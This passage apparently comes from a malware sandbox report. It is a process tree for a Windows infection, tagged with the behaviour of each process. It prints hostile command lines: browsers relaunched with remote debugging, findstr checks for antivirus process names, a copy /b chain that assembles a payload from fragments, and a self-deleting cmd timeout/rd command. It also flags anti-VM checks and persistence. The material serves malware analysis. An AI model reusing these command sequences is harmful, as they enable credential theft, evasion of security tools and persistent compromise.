        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4168,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4180,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:5404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5068,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:8
        9⤵
        
        PID:412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:8
        9⤵
        
        PID:6184
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5196,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
        9⤵
        
        PID:7104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5084,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:8
        9⤵
        
        PID:6968
        
        C:\ProgramData\0r1vaa1no8.exe
        
        "C:\ProgramData\0r1vaa1no8.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\ProgramData\89r1ngvkng.exe
        
        "C:\ProgramData\89r1ngvkng.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7068
        
        C:\ProgramData\89r1ngvkng.exe
        
        "C:\ProgramData\89r1ngvkng.exe"
        9⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        
        PID:5816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        10⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Local\FkScDGW3CqUh.exe
        
        "C:\Users\Admin\AppData\Local\FkScDGW3CqUh.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:22296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:22316
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:22332
        
        C:\Users\Admin\AppData\Local\799zieDGb1Fh.exe
        
        "C:\Users\Admin\AppData\Local\799zieDGb1Fh.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:22396
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:22412
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:22428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:20580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffed039dcf8,0x7ffed039dd04,0x7ffed039dd10
        13⤵
        
        PID:20604
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1584,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:3
        13⤵
        
        PID:20804
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        13⤵
        
        PID:20816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2316,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2480 /prefetch:8
        13⤵
        
        PID:20876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3088 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:20916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:20924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4260 /prefetch:2
        13⤵
        Uses browser remote debugging
        
        PID:21148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4452,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4604 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:21240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4796,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4872 /prefetch:8
        13⤵
        
        PID:21640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5392 /prefetch:8
        13⤵
        
        PID:21684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:9584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        13⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:9596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7ffeb58ef208,0x7ffeb58ef214,0x7ffeb58ef220
        14⤵
        
        PID:9628
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 9628 -s 560
        15⤵
        
        PID:10500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1956,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
        14⤵
        
        PID:9888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2044,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2036 /prefetch:2
        14⤵
        
        PID:9896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
        14⤵
        
        PID:9908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:10156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3520,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:10168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=2680,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:10244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4316,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:2
        14⤵
        Uses browser remote debugging
        
        PID:10252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3692,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:2
        14⤵
        
        PID:17324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3880 /prefetch:8
        14⤵
        
        PID:17404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3712,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
        14⤵
        
        PID:11136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4956,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:8
        14⤵
        
        PID:11172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:8
        14⤵
        
        PID:11204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:8
        14⤵
        
        PID:11224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:8
        14⤵
        
        PID:11240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:11644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        13⤵
        Uses browser remote debugging
        
        PID:11684
        
        C:\Users\Admin\AppData\Local\brcUJVpwDfcW.exe
        
        "C:\Users\Admin\AppData\Local\brcUJVpwDfcW.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:22196
        
        C:\Users\Admin\AppData\Local\Temp\92jyOLWg\5KIImHRzgS0Hh1mH.exe
        
        C:\Users\Admin\AppData\Local\Temp\92jyOLWg\5KIImHRzgS0Hh1mH.exe 0
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:22140
        
        C:\Users\Admin\AppData\Local\Temp\92jyOLWg\YqBVrdm8vWYfrU4x.exe
        
        C:\Users\Admin\AppData\Local\Temp\92jyOLWg\YqBVrdm8vWYfrU4x.exe 22140
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:22080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 22080 -s 616
        13⤵
        Program crash
        
        PID:18248
        
        C:\ProgramData\asr1dbsjmy.exe
        
        "C:\ProgramData\asr1dbsjmy.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
        
        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe 0
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\clLzVtQpT2xPX0V0.exe
        
        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\clLzVtQpT2xPX0V0.exe 6360
        10⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5392
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 932
        10⤵
        Program crash
        
        PID:16628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\7q9hd" & exit
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:16744
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:22220
      - C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3940
      - C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4332
      - C:\Users\Admin\AppData\Local\Temp\10046340101\9625e70c4a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046340101\9625e70c4a.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3108
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6196
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6204
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 674187
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6956
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Funky.wbk
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5336
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Und" Tournament
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:7052
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6624
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
        
        Constraints.com r
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3988
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:996
      - C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1232
        8⤵
        Program crash
        
        PID:18132
      - C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:18296
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:17488
  - - C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
      "C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe"
      4⤵
      Executes dropped EXE
      PID:6612
    - - C:\Users\Admin\AppData\Local\Temp\onefile_6612_133883928431968366\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
